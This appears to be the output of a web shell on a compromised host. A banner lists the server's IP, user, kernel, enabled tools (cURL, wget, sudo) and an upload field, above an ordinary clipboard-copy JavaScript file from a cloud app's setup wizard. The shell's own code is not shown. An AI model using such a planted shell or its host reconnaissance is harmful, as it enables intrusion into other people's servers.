. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 85.13.141.101 / Your IP :
216.73.216.170 [
Web Server : Apache System : Linux dd40236 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : w00ad34b ( 1052) PHP Version : 8.2.30-nmm1 Disable Function : NONE Domains : 429 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /www/htdocs/w00ad34b/spd-cloud/apps/firstrunwizard/js/ |
Upload File : |
(function($, OC, _) {
$(document).ready(function() {
initLinkToClipboard()
$('#endpoint-url').on('click', function() {
$(this).select()
})
})
function initLinkToClipboard() {
var originalTitle = t('firstrunwizard', 'Copy to clipboard')
/* reused from settings/js/authtoken_view.js */
$('#endpoint-url + .clipboardButton').tooltip({
placement: 'bottom',
title: originalTitle,
trigger: 'hover'
})
// Clipboard!
var clipboard = new Clipboard('.clipboardButton')
clipboard.on('success', function(e) {
var $input = $(e.trigger)
// show copied notification
$input.tooltip('hide')
.attr('data-original-title', t('firstrunwizard', 'Copied!'))
.tooltip('fixTitle')
.tooltip({
placement: 'bottom',
trigger: 'manual'
})
.tooltip('show')
// revert back to original title
_.delay(function() {
$input.tooltip('hide')
.attr('data-original-title', originalTitle)
.tooltip('fixTitle')
}, 3000)
})
clipboard.on('error', function(e) {
var $input = $(e.trigger)
var actionMsg = ''
if (/iPhone|iPad/i.test(navigator.userAgent)) {
actionMsg = t('firstrunwizard', 'Not supported!')
} else if (/Mac/i.test(navigator.userAgent)) {
actionMsg = t('firstrunwizard', 'Press ⌘-C to copy.')
} else {
actionMsg = t('firstrunwizard', 'Press Ctrl-C to copy.')
}
// show error
$input.tooltip('hide')
.attr('data-original-title', actionMsg)
.tooltip('fixTitle')
.tooltip({
placement: 'bottom',
trigger: 'manual'
})
.tooltip('show')
// revert back to original title
_.delay(function() {
$input.tooltip('hide')
.attr('data-original-title', originalTitle)
.tooltip('fixTitle')
}, 3000)
})
}
})(jQuery, OC, _)